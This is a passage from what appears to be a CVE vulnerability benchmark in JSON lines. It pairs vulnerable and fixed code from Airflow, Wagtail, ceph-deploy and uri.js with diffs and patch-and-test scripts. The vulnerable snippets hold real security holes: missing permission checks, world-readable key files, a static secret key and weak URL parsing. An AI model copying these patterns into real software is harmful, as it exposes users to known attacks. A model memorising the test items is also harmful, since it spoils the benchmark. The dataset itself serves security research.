authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/a8900fa5f2b8963e9f57ba4ae5520a5d339aeaad", "https://github.com/apache/airflow/commit/fe6d00a54f83468e296777d3b83b65a2ae7169ec", "https://github.com/apache/airflow/commit/6b065840323f9a4fc8e372b458d26e419e4fa99b", "https://github.com/apache/airflow/commit/2f3b1c780472afd4c8a93633e6633feb7083792e", "https://github.com/apache/airflow/commit/97b2735d65e95c4633966667b6db3908540f3937", "https://github.com/apache/airflow/commit/9e01476a50b9be27c4b1e6c6e24d36f290629195", "https://github.com/apache/airflow/commit/dfa7b26ddaca80ee8fd9915ee9f6eac50fac77f6"], "programing_language": "Python", "vul_func": [{"id": "vul_py_89_1", "commit": "2f3b1c7", "file_path": "airflow/www_rbac/app.py", "start_line": "50", "end_line": "280", "snippet": "def create_app(config=None, session=None, testing=False, app_name=\"Airflow\"):\n global app, appbuilder\n app = Flask(__name__)\n if conf.getboolean('webserver', 'ENABLE_PROXY_FIX'):\n app.wsgi_app = ProxyFix(\n app.wsgi_app,\n num_proxies=conf.get(\"webserver\", \"PROXY_FIX_NUM_PROXIES\", fallback=None),\n x_for=conf.getint(\"webserver\", \"PROXY_FIX_X_FOR\", fallback=1),\n x_proto=conf.getint(\"webserver\", \"PROXY_FIX_X_PROTO\", fallback=1),\n x_host=conf.getint(\"webserver\", \"PROXY_FIX_X_HOST\", fallback=1),\n x_port=conf.getint(\"webserver\", \"PROXY_FIX_X_PORT\", fallback=1),\n x_prefix=conf.getint(\"webserver\", \"PROXY_FIX_X_PREFIX\", fallback=1)\n )\n app.secret_key = conf.get('webserver', 'SECRET_KEY')\n app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=settings.get_session_lifetime_config())\n\n app.config.from_pyfile(settings.WEBSERVER_CONFIG, silent=True)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['APP_NAME'] = app_name\n app.config['TESTING'] = testing\n\n app.config['SESSION_COOKIE_HTTPONLY'] = True\n app.config['SESSION_COOKIE_SECURE'] = conf.getboolean('webserver', 'COOKIE_SECURE')\n app.config['SESSION_COOKIE_SAMESITE'] = conf.get('webserver', 'COOKIE_SAMESITE')\n\n if config:\n app.config.from_mapping(config)\n\n if 'SQLALCHEMY_ENGINE_OPTIONS' not in app.config:\n app.config['SQLALCHEMY_ENGINE_OPTIONS'] = settings.prepare_engine_args()\n\n csrf.init_app(app)\n\n db = SQLA(app)\n\n from airflow import api\n api.load_auth()\n api.API_AUTH.api_auth.init_app(app)\n\n # flake8: noqa: F841\n cache = Cache(app=app, config={'CACHE_TYPE': 'filesystem', 'CACHE_DIR': '/tmp'})\n\n from airflow.www_rbac.blueprints import routes\n app.register_blueprint(routes)\n\n configure_logging()\n configure_manifest_files(app)\n\n with app.app_context():\n from airflow.www_rbac.security import AirflowSecurityManager\n security_manager_class = app.config.get('SECURITY_MANAGER_CLASS') or \\\n AirflowSecurityManager\n\n if not issubclass(security_manager_class, AirflowSecurityManager):\n raise Exception(\n \"\"\"Your CUSTOM_SECURITY_MANAGER must now extend AirflowSecurityManager,\n not FAB's security manager.\"\"\")\n\n appbuilder = AppBuilder(\n app,\n db.session if not session else session,\n security_manager_class=security_manager_class,\n base_template='airflow/master.html',\n update_perms=conf.getboolean('webserver', 'UPDATE_FAB_PERMS'))\n\n def init_views(appbuilder):\n from airflow.www_rbac import views\n # Remove the session from scoped_session registry to avoid\n # reusing a session with a disconnected connection\n appbuilder.session.remove()\n appbuilder.add_view_no_menu(views.Airflow())\n appbuilder.add_view_no_menu(views.DagModelView())\n appbuilder.add_view(views.DagRunModelView,\n \"DAG Runs\",\n category=\"Browse\",\n category_icon=\"fa-globe\")\n appbuilder.add_view(views.JobModelView,\n \"Jobs\",\n category=\"Browse\")\n appbuilder.add_view(views.LogModelView,\n \"Logs\",\n category=\"Browse\")\n appbuilder.add_view(views.SlaMissModelView,\n \"SLA Misses\",\n category=\"Browse\")\n appbuilder.add_view(views.TaskInstanceModelView,\n \"Task Instances\",\n category=\"Browse\")\n appbuilder.add_view(views.TaskRescheduleModelView,\n \"Task Reschedules\",\n category=\"Browse\")\n appbuilder.add_view(views.ConfigurationView,\n \"Configurations\",\n category=\"Admin\",\n category_icon=\"fa-user\")\n appbuilder.add_view(views.ConnectionModelView,\n \"Connections\",\n category=\"Admin\")\n appbuilder.add_view(views.PoolModelView,\n \"Pools\",\n category=\"Admin\")\n appbuilder.add_view(views.VariableModelView,\n \"Variables\",\n category=\"Admin\")\n appbuilder.add_view(views.XComModelView,\n \"XComs\",\n category=\"Admin\")\n\n if \"dev\" in version.version:\n airflow_doc_site = \"https://airflow.readthedocs.io/en/latest\"\n else:\n airflow_doc_site = 'https://airflow.apache.org/docs/{}'.format(version.version)\n\n appbuilder.add_link(\"Documentation\",\n href=airflow_doc_site,\n category=\"Docs\",\n category_icon=\"fa-cube\")\n appbuilder.add_link(\"GitHub\",\n href='https://github.com/apache/airflow',\n category=\"Docs\")\n appbuilder.add_view(views.VersionView,\n 'Version',\n category='About',\n category_icon='fa-th')\n\n def integrate_plugins():\n \"\"\"Integrate plugins to the context\"\"\"\n from airflow.plugins_manager import (\n flask_appbuilder_views, flask_appbuilder_menu_links\n )\n\n for v in flask_appbuilder_views:\n log.debug(\"Adding view %s\", v[\"name\"])\n appbuilder.add_view(v[\"view\"],\n v[\"name\"],\n category=v[\"category\"])\n for ml in sorted(flask_appbuilder_menu_links, key=lambda x: x[\"name\"]):\n log.debug(\"Adding menu link %s\", ml[\"name\"])\n appbuilder.add_link(ml[\"name\"],\n href=ml[\"href\"],\n category=ml[\"category\"],\n category_icon=ml[\"category_icon\"])\n\n integrate_plugins()\n # Garbage collect old permissions/views after they have been modified.\n # Otherwise, when the name of a view or menu is changed, the framework\n # will add the new Views and Menus names to the backend, but will not\n # delete the old ones.\n\n def init_plugin_blueprints(app):\n from airflow.plugins_manager import flask_blueprints\n\n for bp in flask_blueprints:\n log.debug(\"Adding blueprint %s:%s\", bp[\"name\"], bp[\"blueprint\"].import_name)\n app.register_blueprint(bp[\"blueprint\"])\n\n init_views(appbuilder)\n init_plugin_blueprints(app)\n\n if conf.getboolean('webserver', 'UPDATE_FAB_PERMS'):\n security_manager = appbuilder.sm\n security_manager.sync_roles()\n\n from airflow.www_rbac.api.experimental import endpoints as e\n # required for testing purposes otherwise the module retains\n # a link to the default_auth\n if app.config['TESTING']:\n if six.PY2:\n reload(e) # noqa\n else:\n import importlib\n importlib.reload(e)\n\n app.register_blueprint(e.api_experimental, url_prefix='/api/experimental')\n\n server_timezone = conf.get('core', 'default_timezone')\n if server_timezone == \"system\":\n server_timezone = pendulum.local_timezone().name\n elif server_timezone == \"utc\":\n server_timezone = \"UTC\"\n\n default_ui_timezone = conf.get('webserver', 'default_ui_timezone')\n if default_ui_timezone == \"system\":\n default_ui_timezone = pendulum.local_timezone().name\n elif default_ui_timezone == \"utc\":\n default_ui_timezone = \"UTC\"\n if not default_ui_timezone:\n default_ui_timezone = server_timezone\n\n @app.context_processor\n def jinja_globals(): # pylint: disable=unused-variable\n\n globals = {\n 'server_timezone': server_timezone,\n 'default_ui_timezone': default_ui_timezone,\n 'hostname': socket.getfqdn() if conf.getboolean(\n 'webserver', 'EXPOSE_HOSTNAME', fallback=True) else 'redact',\n 'navbar_color': conf.get('webserver', 'NAVBAR_COLOR'),\n 'log_fetch_delay_sec': conf.getint(\n 'webserver', 'log_fetch_delay_sec', fallback=2),\n 'log_auto_tailing_offset': conf.getint(\n 'webserver', 'log_auto_tailing_offset', fallback=30),\n 'log_animation_speed': conf.getint(\n 'webserver', 'log_animation_speed', fallback=1000),\n 'state_color_mapping': STATE_COLORS\n }\n\n if 'analytics_tool' in conf.getsection('webserver'):\n globals.update({\n 'analytics_tool': conf.get('webserver', 'ANALYTICS_TOOL'),\n 'analytics_id': conf.get('webserver', 'ANALYTICS_ID')\n })\n\n return globals\n\n @app.teardown_appcontext\n def shutdown_session(exception=None):\n settings.Session.remove()\n\n @app.after_request\n def apply_caching(response):\n _x_frame_enabled = conf.getboolean('webserver', 'X_FRAME_ENABLED', fallback=True)\n if not _x_frame_enabled:\n response.headers[\"X-Frame-Options\"] = \"DENY\"\n return response\n\n @app.before_request\n def make_session_permanent():\n flask_session.permanent = True\n\n return app, appbuilder"}], "fix_func": [{"id": "fix_py_89_1", "commit": "a8900fa", "file_path": "airflow/www_rbac/app.py", "start_line": "51", "end_line": "286", "snippet": "def create_app(config=None, session=None, testing=False, app_name=\"Airflow\"):\n global app, appbuilder\n app = Flask(__name__)\n if conf.getboolean('webserver', 'ENABLE_PROXY_FIX'):\n app.wsgi_app = ProxyFix(\n app.wsgi_app,\n num_proxies=conf.get(\"webserver\", \"PROXY_FIX_NUM_PROXIES\", fallback=None),\n x_for=conf.getint(\"webserver\", \"PROXY_FIX_X_FOR\", fallback=1),\n x_proto=conf.getint(\"webserver\", \"PROXY_FIX_X_PROTO\", fallback=1),\n x_host=conf.getint(\"webserver\", \"PROXY_FIX_X_HOST\", fallback=1),\n x_port=conf.getint(\"webserver\", \"PROXY_FIX_X_PORT\", fallback=1),\n x_prefix=conf.getint(\"webserver\", \"PROXY_FIX_X_PREFIX\", fallback=1)\n )\n app.secret_key = conf.get('webserver', 'SECRET_KEY')\n app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=settings.get_session_lifetime_config())\n\n if conf.get('webserver', 'SECRET_KEY') == \"temporary_key\":\n app.secret_key = os.urandom(16)\n else:\n app.secret_key = conf.get('webserver', 'SECRET_KEY')\n\n app.config.from_pyfile(settings.WEBSERVER_CONFIG, silent=True)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['APP_NAME'] = app_name\n app.config['TESTING'] = testing\n\n app.config['SESSION_COOKIE_HTTPONLY'] = True\n app.config['SESSION_COOKIE_SECURE'] = conf.getboolean('webserver', 'COOKIE_SECURE')\n app.config['SESSION_COOKIE_SAMESITE'] = conf.get('webserver', 'COOKIE_SAMESITE')\n\n if config:\n app.config.from_mapping(config)\n\n if 'SQLALCHEMY_ENGINE_OPTIONS' not in app.config:\n app.config['SQLALCHEMY_ENGINE_OPTIONS'] = settings.prepare_engine_args()\n\n csrf.init_app(app)\n\n db = SQLA(app)\n\n from airflow import api\n api.load_auth()\n api.API_AUTH.api_auth.init_app(app)\n\n # flake8: noqa: F841\n cache = Cache(app=app, config={'CACHE_TYPE': 'filesystem', 'CACHE_DIR': '/tmp'})\n\n from airflow.www_rbac.blueprints import routes\n app.register_blueprint(routes)\n\n configure_logging()\n configure_manifest_files(app)\n\n with app.app_context():\n from airflow.www_rbac.security import AirflowSecurityManager\n security_manager_class = app.config.get('SECURITY_MANAGER_CLASS') or \\\n AirflowSecurityManager\n\n if not issubclass(security_manager_class, AirflowSecurityManager):\n raise Exception(\n \"\"\"Your CUSTOM_SECURITY_MANAGER must now extend AirflowSecurityManager,\n not FAB's security manager.\"\"\")\n\n appbuilder = AppBuilder(\n app,\n db.session if not session else session,\n security_manager_class=security_manager_class,\n base_template='airflow/master.html',\n update_perms=conf.getboolean('webserver', 'UPDATE_FAB_PERMS'))\n\n def init_views(appbuilder):\n from airflow.www_rbac import views\n # Remove the session from scoped_session registry to avoid\n # reusing a session with a disconnected connection\n appbuilder.session.remove()\n appbuilder.add_view_no_menu(views.Airflow())\n appbuilder.add_view_no_menu(views.DagModelView())\n appbuilder.add_view(views.DagRunModelView,\n \"DAG Runs\",\n category=\"Browse\",\n category_icon=\"fa-globe\")\n appbuilder.add_view(views.JobModelView,\n \"Jobs\",\n category=\"Browse\")\n appbuilder.add_view(views.LogModelView,\n \"Logs\",\n category=\"Browse\")\n appbuilder.add_view(views.SlaMissModelView,\n \"SLA Misses\",\n category=\"Browse\")\n appbuilder.add_view(views.TaskInstanceModelView,\n \"Task Instances\",\n category=\"Browse\")\n appbuilder.add_view(views.TaskRescheduleModelView,\n \"Task Reschedules\",\n category=\"Browse\")\n appbuilder.add_view(views.ConfigurationView,\n \"Configurations\",\n category=\"Admin\",\n category_icon=\"fa-user\")\n appbuilder.add_view(views.ConnectionModelView,\n \"Connections\",\n category=\"Admin\")\n appbuilder.add_view(views.PoolModelView,\n \"Pools\",\n category=\"Admin\")\n appbuilder.add_view(views.VariableModelView,\n \"Variables\",\n category=\"Admin\")\n appbuilder.add_view(views.XComModelView,\n \"XComs\",\n category=\"Admin\")\n\n if \"dev\" in version.version:\n airflow_doc_site = \"https://airflow.readthedocs.io/en/latest\"\n else:\n airflow_doc_site = 'https://airflow.apache.org/docs/{}'.format(version.version)\n\n appbuilder.add_link(\"Documentation\",\n href=airflow_doc_site,\n category=\"Docs\",\n category_icon=\"fa-cube\")\n appbuilder.add_link(\"GitHub\",\n href='https://github.com/apache/airflow',\n category=\"Docs\")\n appbuilder.add_view(views.VersionView,\n 'Version',\n category='About',\n category_icon='fa-th')\n\n def integrate_plugins():\n \"\"\"Integrate plugins to the context\"\"\"\n from airflow.plugins_manager import (\n flask_appbuilder_views, flask_appbuilder_menu_links\n )\n\n for v in flask_appbuilder_views:\n log.debug(\"Adding view %s\", v[\"name\"])\n appbuilder.add_view(v[\"view\"],\n v[\"name\"],\n category=v[\"category\"])\n for ml in sorted(flask_appbuilder_menu_links, key=lambda x: x[\"name\"]):\n log.debug(\"Adding menu link %s\", ml[\"name\"])\n appbuilder.add_link(ml[\"name\"],\n href=ml[\"href\"],\n category=ml[\"category\"],\n category_icon=ml[\"category_icon\"])\n\n integrate_plugins()\n # Garbage collect old permissions/views after they have been modified.\n # Otherwise, when the name of a view or menu is changed, the framework\n # will add the new Views and Menus names to the backend, but will not\n # delete the old ones.\n\n def init_plugin_blueprints(app):\n from airflow.plugins_manager import flask_blueprints\n\n for bp in flask_blueprints:\n log.debug(\"Adding blueprint %s:%s\", bp[\"name\"], bp[\"blueprint\"].import_name)\n app.register_blueprint(bp[\"blueprint\"])\n\n init_views(appbuilder)\n init_plugin_blueprints(app)\n\n if conf.getboolean('webserver', 'UPDATE_FAB_PERMS'):\n security_manager = appbuilder.sm\n security_manager.sync_roles()\n\n from airflow.www_rbac.api.experimental import endpoints as e\n # required for testing purposes otherwise the module retains\n # a link to the default_auth\n if app.config['TESTING']:\n if six.PY2:\n reload(e) # noqa\n else:\n import importlib\n importlib.reload(e)\n\n app.register_blueprint(e.api_experimental, url_prefix='/api/experimental')\n\n server_timezone = conf.get('core', 'default_timezone')\n if server_timezone == \"system\":\n server_timezone = pendulum.local_timezone().name\n elif server_timezone == \"utc\":\n server_timezone = \"UTC\"\n\n default_ui_timezone = conf.get('webserver', 'default_ui_timezone')\n if default_ui_timezone == \"system\":\n default_ui_timezone = pendulum.local_timezone().name\n elif default_ui_timezone == \"utc\":\n default_ui_timezone = \"UTC\"\n if not default_ui_timezone:\n default_ui_timezone = server_timezone\n\n @app.context_processor\n def jinja_globals(): # pylint: disable=unused-variable\n\n globals = {\n 'server_timezone': server_timezone,\n 'default_ui_timezone': default_ui_timezone,\n 'hostname': socket.getfqdn() if conf.getboolean(\n 'webserver', 'EXPOSE_HOSTNAME', fallback=True) else 'redact',\n 'navbar_color': conf.get('webserver', 'NAVBAR_COLOR'),\n 'log_fetch_delay_sec': conf.getint(\n 'webserver', 'log_fetch_delay_sec', fallback=2),\n 'log_auto_tailing_offset': conf.getint(\n 'webserver', 'log_auto_tailing_offset', fallback=30),\n 'log_animation_speed': conf.getint(\n 'webserver', 'log_animation_speed', fallback=1000),\n 'state_color_mapping': STATE_COLORS\n }\n\n if 'analytics_tool' in conf.getsection('webserver'):\n globals.update({\n 'analytics_tool': conf.get('webserver', 'ANALYTICS_TOOL'),\n 'analytics_id': conf.get('webserver', 'ANALYTICS_ID')\n })\n\n return globals\n\n @app.teardown_appcontext\n def shutdown_session(exception=None):\n settings.Session.remove()\n\n @app.after_request\n def apply_caching(response):\n _x_frame_enabled = conf.getboolean('webserver', 'X_FRAME_ENABLED', fallback=True)\n if not _x_frame_enabled:\n response.headers[\"X-Frame-Options\"] = \"DENY\"\n return response\n\n @app.before_request\n def make_session_permanent():\n flask_session.permanent = True\n\n return app, appbuilder"}], "vul_patch": "--- a/airflow/www_rbac/app.py\n+++ b/airflow/www_rbac/app.py\n@@ -14,6 +14,11 @@\n app.secret_key = conf.get('webserver', 'SECRET_KEY')\n app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=settings.get_session_lifetime_config())\n \n+ if conf.get('webserver', 'SECRET_KEY') == \"temporary_key\":\n+ app.secret_key = os.urandom(16)\n+ else:\n+ app.secret_key = conf.get('webserver', 'SECRET_KEY')\n+\n app.config.from_pyfile(settings.WEBSERVER_CONFIG, silent=True)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['APP_NAME'] = app_name\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-45809", "cve_description": "Wagtail is an open source content management system built on Django. A user with a limited-permission editor account for the Wagtail admin can make a direct URL request to the admin view that handles bulk actions on user accounts. While authentication rules prevent the user from making any changes, the error message discloses the display names of user accounts, and by modifying URL parameters, the user can retrieve the display name for any user. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 4.1.8 (LTS), 5.0.5 and 5.1.3. The fix is also included in Release Candidate 1 of the forthcoming Wagtail 5.2 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-532": {"name": "Insertion of Sensitive Information into Log File", "description": "The product writes sensitive information to a log file."}}, "repo": "https://github.com/wagtail/wagtail", "patch_url": ["https://github.com/wagtail/wagtail/commit/bc96aed6ac53f998b2f4c4bf97e2d4f5fe337e5b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_70_1", "commit": "190af78", "file_path": "wagtail/users/views/bulk_actions/user_bulk_action.py", "start_line": 6, "end_line": 8, "snippet": "class UserBulkAction(BulkAction):\n models = [get_user_model()]"}], "fix_func": [{"id": "fix_py_70_1", "commit": "bc96aed6ac53f998b2f4c4bf97e2d4f5fe337e5b", "file_path": "wagtail/users/views/bulk_actions/user_bulk_action.py", "start_line": 8, "end_line": 14, "snippet": "User = get_user_model()\n\n\nclass UserBulkAction(PermissionCheckedMixin, BulkAction):\n models = [User]\n permission_policy = ModelPermissionPolicy(User)\n any_permission_required = [\"add\", \"change\", \"delete\"]"}], "vul_patch": "--- a/wagtail/users/views/bulk_actions/user_bulk_action.py\n+++ b/wagtail/users/views/bulk_actions/user_bulk_action.py\n@@ -1,3 +1,7 @@\n+User = get_user_model()\n \n-class UserBulkAction(BulkAction):\n- models = [get_user_model()]\n+\n+class UserBulkAction(PermissionCheckedMixin, BulkAction):\n+ models = [User]\n+ permission_policy = ModelPermissionPolicy(User)\n+ any_permission_required = [\"add\", \"change\", \"delete\"]\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-45809:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/wagtail\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-45809/bin/python runtests.py wagtail.users.tests.test_bulk_actions.test_bulk_delete.TestUserDeleteView.test_user_permissions_required\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-45809:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/wagtail\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-45809/bin/python runtests.py wagtail.users.tests.test_bulk_actions.test_bulk_delete\n"} {"cve_id": "CVE-2015-3010", "cve_description": "ceph-deploy before 1.5.23 uses weak permissions (644) for ceph/ceph.client.admin.keyring, which allows local users to obtain sensitive information by reading the file.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/ceph/ceph-deploy", "patch_url": ["https://github.com/ceph/ceph-deploy/commit/eee56770393bf19ed2dd5389226c6190c08dee3f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_228_1", "commit": "764d6e3", "file_path": "ceph_deploy/gatherkeys.py", "start_line": 32, "end_line": 76, "snippet": "def gatherkeys(args):\n # client.admin\n keyring = '/etc/ceph/{cluster}.client.admin.keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.client.admin.keyring'.format(\n cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n raise exc.KeyNotFoundError(keyring, args.mon)\n\n # mon.\n keyring = '/var/lib/ceph/mon/{cluster}-{{hostname}}/keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.mon.keyring'.format(cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n raise exc.KeyNotFoundError(keyring, args.mon)\n\n # bootstrap\n for what in ['osd', 'mds', 'rgw']:\n keyring = '/var/lib/ceph/bootstrap-{what}/{cluster}.keyring'.format(\n what=what,\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.bootstrap-{what}.keyring'.format(\n cluster=args.cluster,\n what=what),\n _hosts=args.mon,\n )\n if not r:\n if what in ['osd', 'mds']:\n raise exc.KeyNotFoundError(keyring, args.mon)\n else:\n LOG.warning((\"No RGW bootstrap key found. Will not be able to \"\n \"deploy RGW daemons\"))"}, {"id": "vul_py_228_2", "commit": "764d6e3", "file_path": "ceph_deploy/new.py", "start_line": 207, "end_line": 225, "snippet": "def new_mon_keyring(args):\n LOG.debug('Creating a random mon key...')\n mon_keyring = '[mon.]\\nkey = %s\\ncaps mon = allow *\\n' % generate_auth_key()\n\n keypath = '{name}.mon.keyring'.format(\n name=args.cluster,\n )\n\n LOG.debug('Writing monitor keyring to %s...', keypath)\n tmp = '%s.tmp' % keypath\n with file(tmp, 'w') as f:\n f.write(mon_keyring)\n try:\n os.rename(tmp, keypath)\n except OSError as e:\n if e.errno == errno.EEXIST:\n raise exc.ClusterExistsError(keypath)\n else:\n raise"}], "fix_func": [{"id": "fix_py_228_1", "commit": "eee5677", "file_path": "ceph_deploy/gatherkeys.py", "start_line": 32, "end_line": 80, "snippet": "def gatherkeys(args):\n oldmask = os.umask(077)\n try:\n # client.admin\n keyring = '/etc/ceph/{cluster}.client.admin.keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.client.admin.keyring'.format(\n cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n raise exc.KeyNotFoundError(keyring, args.mon)\n\n # mon.\n keyring = '/var/lib/ceph/mon/{cluster}-{{hostname}}/keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.mon.keyring'.format(cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n raise exc.KeyNotFoundError(keyring, args.mon)\n\n # bootstrap\n for what in ['osd', 'mds', 'rgw']:\n keyring = '/var/lib/ceph/bootstrap-{what}/{cluster}.keyring'.format(\n what=what,\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.bootstrap-{what}.keyring'.format(\n cluster=args.cluster,\n what=what),\n _hosts=args.mon,\n )\n if not r:\n if what in ['osd', 'mds']:\n raise exc.KeyNotFoundError(keyring, args.mon)\n else:\n LOG.warning((\"No RGW bootstrap key found. Will not be able to \"\n \"deploy RGW daemons\"))\n finally:\n os.umask(oldmask)"}, {"id": "fix_py_228_2", "commit": "eee5677", "file_path": "ceph_deploy/new.py", "start_line": 207, "end_line": 228, "snippet": "def new_mon_keyring(args):\n LOG.debug('Creating a random mon key...')\n mon_keyring = '[mon.]\\nkey = %s\\ncaps mon = allow *\\n' % generate_auth_key()\n\n keypath = '{name}.mon.keyring'.format(\n name=args.cluster,\n )\n oldmask = os.umask(077)\n LOG.debug('Writing monitor keyring to %s...', keypath)\n try:\n tmp = '%s.tmp' % keypath\n with open(tmp, 'w', 0600) as f:\n f.write(mon_keyring)\n try:\n os.rename(tmp, keypath)\n except OSError as e:\n if e.errno == errno.EEXIST:\n raise exc.ClusterExistsError(keypath)\n else:\n raise\n finally:\n os.umask(oldmask)"}], "vul_patch": "--- a/ceph_deploy/gatherkeys.py\n+++ b/ceph_deploy/gatherkeys.py\n@@ -1,45 +1,49 @@\n def gatherkeys(args):\n- # client.admin\n- keyring = '/etc/ceph/{cluster}.client.admin.keyring'.format(\n- cluster=args.cluster)\n- r = fetch_file(\n- args=args,\n- frompath=keyring,\n- topath='{cluster}.client.admin.keyring'.format(\n- cluster=args.cluster),\n- _hosts=args.mon,\n- )\n- if not r:\n- raise exc.KeyNotFoundError(keyring, args.mon)\n-\n- # mon.\n- keyring = '/var/lib/ceph/mon/{cluster}-{{hostname}}/keyring'.format(\n- cluster=args.cluster)\n- r = fetch_file(\n- args=args,\n- frompath=keyring,\n- topath='{cluster}.mon.keyring'.format(cluster=args.cluster),\n- _hosts=args.mon,\n- )\n- if not r:\n- raise exc.KeyNotFoundError(keyring, args.mon)\n-\n- # bootstrap\n- for what in ['osd', 'mds', 'rgw']:\n- keyring = '/var/lib/ceph/bootstrap-{what}/{cluster}.keyring'.format(\n- what=what,\n+ oldmask = os.umask(077)\n+ try:\n+ # client.admin\n+ keyring = '/etc/ceph/{cluster}.client.admin.keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n- topath='{cluster}.bootstrap-{what}.keyring'.format(\n- cluster=args.cluster,\n- what=what),\n+ topath='{cluster}.client.admin.keyring'.format(\n+ cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n- if what in ['osd', 'mds']:\n- raise exc.KeyNotFoundError(keyring, args.mon)\n- else:\n- LOG.warning((\"No RGW bootstrap key found. Will not be able to \"\n- \"deploy RGW daemons\"))\n+ raise exc.KeyNotFoundError(keyring, args.mon)\n+\n+ # mon.\n+ keyring = '/var/lib/ceph/mon/{cluster}-{{hostname}}/keyring'.format(\n+ cluster=args.cluster)\n+ r = fetch_file(\n+ args=args,\n+ frompath=keyring,\n+ topath='{cluster}.mon.keyring'.format(cluster=args.cluster),\n+ _hosts=args.mon,\n+ )\n+ if not r:\n+ raise exc.KeyNotFoundError(keyring, args.mon)\n+\n+ # bootstrap\n+ for what in ['osd', 'mds', 'rgw']:\n+ keyring = '/var/lib/ceph/bootstrap-{what}/{cluster}.keyring'.format(\n+ what=what,\n+ cluster=args.cluster)\n+ r = fetch_file(\n+ args=args,\n+ frompath=keyring,\n+ topath='{cluster}.bootstrap-{what}.keyring'.format(\n+ cluster=args.cluster,\n+ what=what),\n+ _hosts=args.mon,\n+ )\n+ if not r:\n+ if what in ['osd', 'mds']:\n+ raise exc.KeyNotFoundError(keyring, args.mon)\n+ else:\n+ LOG.warning((\"No RGW bootstrap key found. Will not be able to \"\n+ \"deploy RGW daemons\"))\n+ finally:\n+ os.umask(oldmask)\n\n--- a/ceph_deploy/new.py\n+++ b/ceph_deploy/new.py\n@@ -5,15 +5,18 @@\n keypath = '{name}.mon.keyring'.format(\n name=args.cluster,\n )\n-\n+ oldmask = os.umask(077)\n LOG.debug('Writing monitor keyring to %s...', keypath)\n- tmp = '%s.tmp' % keypath\n- with file(tmp, 'w') as f:\n- f.write(mon_keyring)\n try:\n- os.rename(tmp, keypath)\n- except OSError as e:\n- if e.errno == errno.EEXIST:\n- raise exc.ClusterExistsError(keypath)\n- else:\n- raise\n+ tmp = '%s.tmp' % keypath\n+ with open(tmp, 'w', 0600) as f:\n+ f.write(mon_keyring)\n+ try:\n+ os.rename(tmp, keypath)\n+ except OSError as e:\n+ if e.errno == errno.EEXIST:\n+ raise exc.ClusterExistsError(keypath)\n+ else:\n+ raise\n+ finally:\n+ os.umask(oldmask)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0868", "cve_description": "Open Redirect in GitHub repository medialize/uri.js prior to 1.19.10.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/medialize/uri.js", "patch_url": ["https://github.com/medialize/uri.js/commit/a8166fe02f3af6dc1b2b888dcbb807155aad9509"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_273_1", "commit": "01920b5cda87d5dd726eab43d6e7f3ce34a2fd52", "file_path": "src/URI.js", "start_line": 491, "end_line": 553, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n\n string = string.replace(URI.leading_whitespace_expression, '')\n\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/i, '$1://');\n\n // extract protocol\n if 